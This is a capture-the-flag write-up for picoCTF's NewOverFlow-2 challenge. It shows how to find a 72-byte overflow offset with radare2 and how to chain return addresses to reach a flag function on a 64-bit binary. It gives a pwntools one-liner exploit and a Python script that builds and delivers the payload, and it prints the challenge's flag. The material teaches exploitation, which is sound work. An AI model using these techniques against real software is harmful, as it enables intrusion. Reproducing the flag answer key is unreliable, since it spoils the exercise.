
NewOverFlow-2

Problem

Okay now let's try manipulating arguments. program. You can find it in /problems/newoverflow-2_5_13f3d3dc09fc09d6d5db8adfa899a05d on the shell server. Source.

Solution

  1. The challenge author forgot to remove the flag function, so this is solvable with the same method as NewOverFlow-1: overwrite the saved return address with the address of flag.
  2. Find the offset/padding
    1. You can use the method described in rop64 with cyclic and cyclic_find, or you can read it straight from the disassembly as follows.
    2. Open vuln in radare2 with r2 ./vuln
    3. Run aaaa
    4. Run pdf @ sym.vuln; the function header lists the buffer as var int local_40h @ rbp-0x40
    5. The 0x40 is how far below rbp the buffer starts, so 8 more bytes are needed to get past the saved rbp register and reach the return address (this is a 64-bit binary, so the saved frame pointer is 8 bytes, not the 4 you would use in 32-bit).
    6. So the offset is 0x40+8 = 72 bytes.
  3. Run afl~flag in radare2 to get the address of flag and afl~main to get the address of main.
  4. We cannot simply return into flag directly, as padding + flag_address would do in 32-bit, because that leaves the stack misaligned in 64-bit: the System V ABI requires rsp to be 16-byte aligned at every call, and the libc functions flag calls use SSE instructions (movaps) that crash on a misaligned stack. Returning straight from vuln into flag leaves rsp off by 8. So instead we form our payload as padding + main_address + flag_address: vuln returns into main first, and flag is reached from there with the alignment fixed. (A single ret gadget placed before flag_address is the usual alternative that has the same effect.)
  5. We can use p64 from pwntools to convert the hex addresses to little endian.
  6. Payload complete: python2 -c "from pwn import *; print 'A'*(0x40+8) + p64(0x004008ce) + p64(0x0040084d)" | ./vuln (the python2 print also appends the trailing newline that gets() waits for).
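
The same payload built step by step without pwntools, as an added example that is not the write-up author's script. It reproduces the offset calculation and the little-endian packing above using only the standard library so the bytes can be inspected before they are sent; the two addresses are the ones the write-up recovered with radare2, and the binary path passed to deliver() is an assumption for local use.

```python
"""Payload construction for the NewOverFlow-2 write-up (added example)."""
import struct
import subprocess
from typing import Sequence

MAIN_ADDR = 0x004008CE        # from `afl~main` in radare2 (write-up value)
FLAG_ADDR = 0x0040084D        # from `afl~flag` in radare2 (write-up value)
BUFFER_RBP_OFFSET = 0x40      # `var int local_40h @ rbp-0x40` from `pdf @ sym.vuln`


def p64(value: int) -> bytes:
    """Little-endian 8-byte pack, the same thing pwntools' p64 does."""
    return struct.pack("<Q", value)


def overflow_offset(buffer_rbp_offset: int) -> int:
    """Distance from the start of the buffer to the saved return address.

    The buffer starts at rbp-0x40, the saved rbp occupies the 8 bytes at rbp,
    and the return address is the 8 bytes after that. On 64-bit the saved
    frame pointer is 8 bytes, not the 4 a 32-bit write-up would add.
    """
    return buffer_rbp_offset + 8


def build_payload(offset: int, chain: Sequence[int], filler: bytes = b"A") -> bytes:
    """padding + p64(addr) for each address, in the order they are popped by ret.

    For this challenge chain = [MAIN_ADDR, FLAG_ADDR]: vuln returns into main
    first (the write-up's fix for 16-byte stack alignment), then into flag.
    """
    return filler * offset + b"".join(p64(a) for a in chain)


def gets_safe(payload: bytes) -> bool:
    """gets() stops at the first newline, so an address byte of 0x0a would
    truncate the chain. NUL bytes are fine for gets(), unlike strcpy-style bugs."""
    return b"\n" not in payload


def newoverflow2_payload() -> bytes:
    """The write-up's exact payload: 'A'*(0x40+8) + p64(main) + p64(flag)."""
    payload = build_payload(overflow_offset(BUFFER_RBP_OFFSET), [MAIN_ADDR, FLAG_ADDR])
    if not gets_safe(payload):
        raise ValueError("chain contains a newline; gets() would truncate it")
    return payload


def deliver(binary: str, payload: bytes) -> str:
    """Pipe the payload plus the newline gets() waits for into the binary.

    `binary` is the challenge path on the shell server (assumed, not run here).
    """
    proc = subprocess.run([binary], input=payload + b"\n",
                          stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    return proc.stdout.decode(errors="replace")


if __name__ == "__main__":
    # Print the bytes for inspection; on the shell server you would instead
    # call deliver("./vuln", newoverflow2_payload()) and read the flag.
    print(newoverflow2_payload().hex())
```

Checking gets_safe before sending is the step the one-liner skips: if either address had contained 0x0a, gets() would have cut the chain short and the crash would have looked like a wrong offset rather than a bad byte.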

Flag

picoCTF{r0p_1t_d0nT_st0p_1t_b3358018}